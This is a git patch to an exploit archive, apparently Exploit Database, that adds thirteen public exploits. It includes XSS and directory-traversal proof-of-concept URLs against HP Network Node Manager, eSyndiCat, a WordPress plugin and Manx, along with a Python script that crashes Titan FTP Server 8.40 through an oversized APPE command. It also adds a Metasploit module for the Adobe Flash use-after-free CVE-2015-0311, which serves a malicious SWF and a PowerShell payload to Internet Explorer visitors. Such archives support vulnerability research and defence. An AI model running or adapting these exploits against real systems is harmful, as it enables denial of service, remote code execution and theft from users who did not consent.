From 42107c1e3390f154964e2ffb4f212ace76a604ab Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Mar 2015 08:36:01 +0000 Subject: [PATCH] Update: 2015-03-14 13 new exploits --- files.csv | 13 ++++ platforms/jsp/webapps/36353.txt | 7 ++ platforms/jsp/webapps/36354.txt | 7 ++ platforms/jsp/webapps/36355.txt | 7 ++ platforms/jsp/webapps/36356.txt | 7 ++ platforms/jsp/webapps/36357.txt | 7 ++ platforms/php/webapps/36362.txt | 13 ++++ platforms/php/webapps/36363.txt | 7 ++ platforms/php/webapps/36364.txt | 11 +++ platforms/php/webapps/36365.txt | 11 +++ platforms/php/webapps/36366.txt | 9 +++ platforms/php/webapps/36367.txt | 9 +++ platforms/windows/dos/36361.py | 87 ++++++++++++++++++++++++ platforms/windows/remote/36360.rb | 107 ++++++++++++++++++++++++++++++ 14 files changed, 302 insertions(+) create mode 100755 platforms/jsp/webapps/36353.txt create mode 100755 platforms/jsp/webapps/36354.txt create mode 100755 platforms/jsp/webapps/36355.txt create mode 100755 platforms/jsp/webapps/36356.txt create mode 100755 platforms/jsp/webapps/36357.txt create mode 100755 platforms/php/webapps/36362.txt create mode 100755 platforms/php/webapps/36363.txt create mode 100755 platforms/php/webapps/36364.txt create mode 100755 platforms/php/webapps/36365.txt create mode 100755 platforms/php/webapps/36366.txt create mode 100755 platforms/php/webapps/36367.txt create mode 100755 platforms/windows/dos/36361.py create mode 100755 platforms/windows/remote/36360.rb diff --git a/files.csv b/files.csv index 36e7b5f83..263ab0ef0 100755 --- a/files.csv +++ b/files.csv @@ -32771,3 +32771,16 @@ id,file,description,date,author,platform,type,port 36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0 +36353,platforms/jsp/webapps/36353.txt,"HP Network Node Manager i 9.10 nnm/mibdiscover node Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 +36354,platforms/jsp/webapps/36354.txt,"HP Network Node Manager i 9.10 nnm/protected/configurationpoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 +36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 +36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 nnm/protected/statuspoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 +36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0 +36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0 +36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0 +36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0 +36363,platforms/php/webapps/36363.txt,"WordPress Skysa App Bar Plugin 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-28,Amir,php,webapps,0 +36364,platforms/php/webapps/36364.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 +36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0 +36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 +36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 diff --git a/platforms/jsp/webapps/36353.txt b/platforms/jsp/webapps/36353.txt new file mode 100755 index 000000000..2e43a77b6 --- /dev/null +++ b/platforms/jsp/webapps/36353.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50806/info + +HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/nnm/mibdiscover?node=[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/36354.txt b/platforms/jsp/webapps/36354.txt new file mode 100755 index 000000000..a23372f21 --- /dev/null +++ b/platforms/jsp/webapps/36354.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50806/info + +HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/nnm/protected/configurationpoll.jsp?nodename=[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/36355.txt b/platforms/jsp/webapps/36355.txt new file mode 100755 index 000000000..d5704535f --- /dev/null +++ b/platforms/jsp/webapps/36355.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50806/info + +HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/protected/ping.jsp?nodename=[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/36356.txt b/platforms/jsp/webapps/36356.txt new file mode 100755 index 000000000..3b1649d1e --- /dev/null +++ b/platforms/jsp/webapps/36356.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50806/info + +HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/nnm/protected/statuspoll.jsp?nodename=[xss] \ No newline at end of file diff --git a/platforms/jsp/webapps/36357.txt b/platforms/jsp/webapps/36357.txt new file mode 100755 index 000000000..63fe8b7e4 --- /dev/null +++ b/platforms/jsp/webapps/36357.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50806/info + +HP Network Node Manager i is prone to multiple unspecified cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/protected/traceroute.jsp?nodename=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36362.txt b/platforms/php/webapps/36362.txt new file mode 100755 index 000000000..1feabdf77 --- /dev/null +++ b/platforms/php/webapps/36362.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/50822/info + +eSyndiCat Pro is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +eSyndiCat Pro 2.3.05 is vulnerable; other versions may also be affected. + +http://www.example.com/demo/admin/controller.php?file=admins&do=edit&id=XSS +http://www.example.com/demo/admin/controller.php?file=blocks&do=edit&id=XSS +http://www.example.com/demo/admin/controller.php?plugin=articles&do=edit&id=XSS +http://www.example.com/demo/admin/controller.php?file=suggest-category&id=XSS +http://www.example.com/demo/admin/controller.php?file=search&_dc=1322239437555&action=get&start=0&limit=10&sort=XSS \ No newline at end of file diff --git a/platforms/php/webapps/36363.txt b/platforms/php/webapps/36363.txt new file mode 100755 index 000000000..da3fbc927 --- /dev/null +++ b/platforms/php/webapps/36363.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/50824/info + +Skysa App Bar Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36364.txt b/platforms/php/webapps/36364.txt new file mode 100755 index 000000000..d21c5f8cc --- /dev/null +++ b/platforms/php/webapps/36364.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/50839/info + +Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. + +Manx 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit="> + +http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php?limit=5&search=1&search_folder=Waddup Thricer! \ No newline at end of file diff --git a/platforms/php/webapps/36365.txt b/platforms/php/webapps/36365.txt new file mode 100755 index 000000000..b17ee9afc --- /dev/null +++ b/platforms/php/webapps/36365.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/50839/info + +Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. + +Manx 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit="> + +http://www.example.com/admin/tiny_mce/plugins/ajaxfilemanager_old/ajax_get_file_listing.php?limit=5&search=1&search_folder=Waddup Thricer! \ No newline at end of file diff --git a/platforms/php/webapps/36366.txt b/platforms/php/webapps/36366.txt new file mode 100755 index 000000000..0793c5419 --- /dev/null +++ b/platforms/php/webapps/36366.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50839/info + +Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. + +Manx 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/admin_blocks.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini \ No newline at end of file diff --git a/platforms/php/webapps/36367.txt b/platforms/php/webapps/36367.txt new file mode 100755 index 000000000..8bf62e682 --- /dev/null +++ b/platforms/php/webapps/36367.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50839/info + +Manx is prone to multiple cross-site scripting and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials. Other harvested information may aid in launching further attacks. + +Manx 1.0.1 is vulnerable; other versions may also be affected. + +http://www.example.com/admin/admin_pages.php?editorChoice=none&fileName=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini \ No newline at end of file diff --git a/platforms/windows/dos/36361.py b/platforms/windows/dos/36361.py new file mode 100755 index 000000000..e5a33ac80 --- /dev/null +++ b/platforms/windows/dos/36361.py @@ -0,0 +1,87 @@ +source: http://www.securityfocus.com/bid/50819/info + +Titan FTP Server is prone to a remote denial-of-service vulnerability. + +Exploiting this issue allows remote attackers to crash the affected FTP server, denying service to legitimate users. + +Titan FTP Server 8.40 is vulnerable; other versions may also be affected. + +#!/usr/bin/python +# +# Exploit Title : Titan FTP Server 8.40 DoS Kernel Crash +# Date: 25/11/2011 +# Author: Houssam Sahli +# Software Link (trial version) : http://southrivertech.com/software/demosoft/titanftp.exe +# Version: 8.40 +# Developed by : South River Technologies, Inc. +# Tested on: Windows XP SP3 French +# Description : This exploit crashs the kernel of a Windows running TITAN FTP Server 8.40 and succeed the magical "blue screen of death". +# Thanks to : Mehdi Boukazoula and Rwissi Networking for their support ;)...because we can improve computer security in Algeria, we'll do it. + +print "\n2ctUtjjJUJUJUJUJjJUJtJtJUUtjfUtt2UftftfUftft1t1tFfF21fhf11Ft" +print "ULcYLYLYLcLc7LLcLccJcJYJYJYjJtJjJtjtJtJtUtjUJjJUJtJUJtjtUtUj" +print "tLUJjJJcJcJcJcJYjhPX0Pb99pb9EbMEDEDEMDZbZDD0XfFf1f2tFf22F21U" +print "JYJJcJcJcJcJcJcJ2 1hf1f1f1212h2h1f" +print "ULJcJcJLYLL7L7L71 Houssam Sahli 1h1f2f2fFt1fF1Ft" +print "ULJcJcJLYLL7L7L71 backtronux@gmail.com 1h1f2f2fFt1fF1Ft" +print "JccJcY7Lr7777LrLY 1ht2t1t1f1t12F12" +print "J7JLcr7r777777L7cUF1hfU7r:i:i:i:rirrj2MRQMMbhf1t2t1tFf1f1tFU" +print "Y7cLr777r7rrrrrrrLr:, .LPRQQQQQQQQDX7:.:7SpXfFt1f1t121th2Fft" +print "J7crc77rriririri: ,:tQQQQQQQQQQQQQQQQQRJ:,i19FFf1t2f2f21hfFU" +print "Y7r777rrii:i::: JQQQQQQPFfS0MM02hftXQRZPc, ipXSf1t2t1t1fF2f" +print "Jr777rrii::::, ,QQQQQQQi..::::i:irRR.,hfL7L: JpSf1tFt12h1Ft" +print "cr7c77rri::: 7QQQQQQQ1:Et7jjJ7Lrr7r. ci::i7. iPS22fFf12F12" +print "Jr7LLrrir:i EQQQQQQQQr:QQQQQ9L7Lri., i.::rtY :hSf1f121fFU" +print "c7rL77rrrr. DQQQQQQQQQ:::riri77c77i. .ri7LfE9 ihh2Ffhfhf2" +print "j7crc77r7i UQQQjrir:rQQFcii:ii77Lrr., f11PpZQZ.JFF1h2F1hf" +print "JLcLrLLLL..QQQc.irr7i0QQQQQMhUrr7Lrr:., :Q9QQQQQQh:1t2tft1f2" +print "J7Jcc7LLJ cQQQQL:i777irUMQQQQQQL77L77rr:pJ:7PQQQQQ:Jhf1tFt2J" +print "JccJcc7c7 2QQQQQE7:r7Lri:r7hDQQQ7LLYLJLc7rrr::XQQQ.jFF1h1h11" +print "tLjJJcJJJ bQQQQQQQRULr77Lrriii7LcLYLYLYLLLc77:cQQQ7cX2h2h2hf" +print "jJJUJjJtY 0QQQQQQQQQ0Mt7rrr777777L7LLcLc7c77::ZQQQJJFh2h2FF1" +print "tLUjjYUjt,tQQQQQQQS .QQQF7iiirr77L7L7L77ii:LMQQQQ72S1h1h1Sf" +print "tjjtjjJff:.QQQQQQQQ ::QQQMpftJc7c77rriLhQQQQQQf:02h1h1F12" +print "2J2UfUttFJ,Q: QQb YQQQQQQQQQQQQQQQQQQQQQQ tXF2F1F2hU" +print "fjf2Uft2thrr :L, , QQQQQQQQQribF2h2F1h22" +print "FJ1t2t2t22hrt, , ,,, , tPJ7 :QQQQQQQQU:bS2h2hfF2h2" +print "tUt1t2f1t11SLS. ,,,,,,,,,,,,, .rt. QQQ1Sp1p2r9Xfh2h2F2h1F" +print "1J1t2t1t2t12SYhr ,,,,,,,,,,, .QQF. .tbS2F1F2F1F1hf" +print "ftf1f1f1t2f12Xt2L. ,,,,,,,,,,,,, fQf .fR0Ffh1h1h2h1F21" +print "hUFt1t1f2t2t1fXhFUL: , , , : .jRRSF2h2h1h1SFF2Sf" +print "2f2FfF2Ff12122fhFphhJ7:. ,:JpRR0212FFh1S1h2hFhF1" +print "hUF21fFf12Ffh2F2h1XX9X9SXffjUccLcJtfpERZESh1hFhFSFS1hFS1S1Sf\n" + +print "\nYou need a valid account to succeed this DoS, but even anonymous can do it as long as it has permission to call APPE command.\n" + +import socket +import sys + +def Usage(): + print ("Usage: ./expl.py \n") +buffer= "./A" * 2000 +def start(hostname, username, passwd): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + sock.connect((hostname, 21)) + except: + print ("[-] Connection error!") + sys.exit(1) + r=sock.recv(1024) + print "[+] " + r + sock.send("user %s\r\n" %username) + r=sock.recv(1024) + sock.send("pass %s\r\n" %passwd) + r=sock.recv(1024) + print "[+] wait for the crash...;)" + sock.send("APPE %s\r\n" %buffer) + sock.close() + +if len(sys.argv) <> 4: + Usage() + sys.exit(1) +else: + hostname=sys.argv[1] + username=sys.argv[2] + passwd=sys.argv[3] + start(hostname,username,passwd) + sys.exit(0) diff --git a/platforms/windows/remote/36360.rb b/platforms/windows/remote/36360.rb new file mode 100755 index 000000000..1c825110d --- /dev/null +++ b/platforms/windows/remote/36360.rb @@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free', + 'Description' => %q{ + This module exploits an use after free vulnerability in Adobe Flash Player. The + vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying + to uncompress() a malformed byte stream. This module has been tested successfully + on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and + 16.0.0.235. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'hdarwin', # Public exploit by @hdarwin89 + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0311'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], + ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], + ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end \ No newline at end of file